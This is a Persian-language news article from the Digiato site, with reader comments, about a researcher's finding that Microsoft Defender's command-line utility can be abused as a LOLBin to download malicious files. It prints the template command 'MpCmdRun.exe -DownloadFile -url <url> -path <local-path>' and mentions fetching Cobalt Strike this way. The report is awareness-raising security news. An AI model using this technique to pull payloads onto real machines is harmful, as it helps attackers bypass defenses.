ثبت بازخورد

لطفا میزان رضایت خود را از دیجیاتو انتخاب کنید.

واقعا راضی‌ام
اصلا راضی نیستم
چطور میتوانیم تجربه بهتری برای شما بسازیم؟

نظر شما با موفقیت ثبت شد.

از اینکه ما را در توسعه بهتر و هدفمند‌تر دیجیاتو همراهی می‌کنید
از شما سپاسگزاریم.

تکنولوژی

آنتی ویروس ویندوز ۱۰ می‌تواند بدافزار دانلود کند

به گفته یکی از محققان امنیتی به‌روزرسانی جدید مایکروسافت دیفندر این نرم افزار را به ابزار دانلود فایل‌های مخرب از اینترنت تبدیل کرده است. یک محقق امنیتی به نام Mohammad Askar می‌گوید تغییرات در ابزار ...

پیمان حسنی
نوشته شده توسط پیمان حسنی | ۱۴ شهریور ۱۳۹۹ | ۱۹:۰۰

در دیجیاتو ثبت‌نام کنید

جهت بهره‌مندی و دسترسی به امکانات ویژه و بخش‌های مختلف در دیجیاتو عضو ویژه دیجیاتو شوید.

عضویت در دیجیاتو
تازه‌های تکنولوژی
ویدئوی مرتبط
حافظه SSD اکسترنال ای‌دیتا
بررسی سخت افزار نگاهی به کاربردهای مختلف SSD اکسترنال؛ از انتقال فیلم در یک ثانیه تا ویندوز پرتابل

به گفته یکی از محققان امنیتی به‌روزرسانی جدید مایکروسافت دیفندر این نرم افزار را به ابزار دانلود فایل‌های مخرب از اینترنت تبدیل کرده است.

یک محقق امنیتی به نام Mohammad Askar می‌گوید تغییرات در ابزار Command Line مایکروسافت دیفندر به هکرها اجازه می‌دهد تا از این آنتی ویروس به عنوان LOLBin استفاده کنند. به آن دسته از فایل‌های معتبر سیستم عامل که می‌توان از آنها برای اهداف خرابکارانه استفاده کرد، LOLBin گفته می‌شود.

LOLBINها در ویندوز ۱۰ وجود داشته و هر کدام از آنها عملکرد غیرخرابکارانه دارند، اما هکرها با دسترسی غیرمجاز می‌توانند از این فایل‌ها برای دور زدن سپرهای امنیتی و حمله به کامپیوتر بدون اطلاع کاربر استفاده کنند.

آنطور که Askar می‌گوید، ابزار Command Line مایکروسافت دیفندر حالا از دستور جدیدی به نام DownloadFile- پشتیبانی می‌کند. این تغییر احتمالاً در نسخه 4.18.2007.9 یا 4.18.2009.9 این نرم افزار رخ داده است.

هکرها با نفوذ به شبکه محلی می‌توانند با استفاده از ابزار Microsoft Antimalware Service Command Line Utility و دستور زیر فایل مخرب را دانلود کنند:

<MpCmdRun.exe -DownloadFile -url <url> -path <local-path

محقق امنیتی یاد شده با استفاده از این تکنیک بدافزاری به نام Cobalt Strike را مستقیماً بوسیله مایکروسافت دیفندر دانلود کرد.

دیفندر قادر به شناسایی و حذف فایل‌های مخرب دانلود شده با استفاده از این روش است، اما مشخص نیست دیگر نرم افزارهای آنتی ویروس نیز قادر به دفاع از سیستم در برابر فایل‌های مخرب دانلود شده از این روش هستند یا خیر. به متخصصین شبکه توصیه می‌شود تا این LOLBin را در لیست خود قرار دهند تا از حمله احتمالی جلوگیری شود.

امنیت بدافزار ویندوز
مقالات و اخبار مرتبط
دیدگاه‌ها و نظرات خود را بنویسید
مجموع نظرات ثبت شده (7 مورد)
  • disna
    disna | ۱۵ شهریور ۱۳۹۹

    آنتی ویروس ویندوز دیفندر بد نیست. ولی اگر امنیت براتون مهمه بهتره ی آنتی ویروس معتبر و ترجیحآ باکیفیت استفاده کنین.

    هر چی آنتی ویروس باکیفیت تر باشه. سطح امنیتی بالاتر و بهتر هستش

    دیسنا: خبرنامه تخصصی آنتی ویروس ها

  • haashmo
    haashmo | ۱۴ شهریور ۱۳۹۹

    درود.آقا این مشکل ورود به سایت رو درست کنید که شده دردسر واسه ما.هر باز میخوایم وارد شیم پیغام خطا میده.این Recapcha رو بردارید.

  • molavy
    molavy | ۱۴ شهریور ۱۳۹۹

    دروغ ننویسید، فقط برنامه های ایرانی بد افزار هستند، یعنی شرکتی با چند صد هزار کارمند نمیتونه برنامه خودش و مدیریت کنه؟ اونم یک شرکت آمریکایی؟

    • Mahdian888
      Mahdian888 | ۱۵ شهریور ۱۳۹۹

      فقط میتونم به پیامت بخندم ??

    • ali_mlk
      ali_mlk | ۱۵ شهریور ۱۳۹۹

      اصلا ربطی نداره و اون چند صد هزار کارمند هم فقط مختص ویندوز دیفندر نیستن که، این نوع مشکلات بهشون میگن باگ که هکرها با استفاده از توانمندی و تبحری که در برنامه نویسی دارن ، پیداشون میکنن این حفره های امنیتی رو و بعدا با شناسایی این حفره تیم سازنده در سریعترین زمان ممکن رفعش میکنه، به هرحال توی هر نرم افزاری ممکنه پیش بیاد و نیازمند زمان بیشتر برای تست هست، که در آینده با هوش مصنوعی تقریبا این باگ ها با ضریب بالایی برطرف میشن

    • sata
      sata | ۱۵ شهریور ۱۳۹۹

      نه نمیتونه. حالا دیگه چرت نگو!

    • dastan
      dastan | ۱۵ شهریور ۱۳۹۹

      نوگل باغ آلبانی چرت نگو عزیزم باشه؟

مطالب پیشنهادی

پیشنهادهای دیجیاتو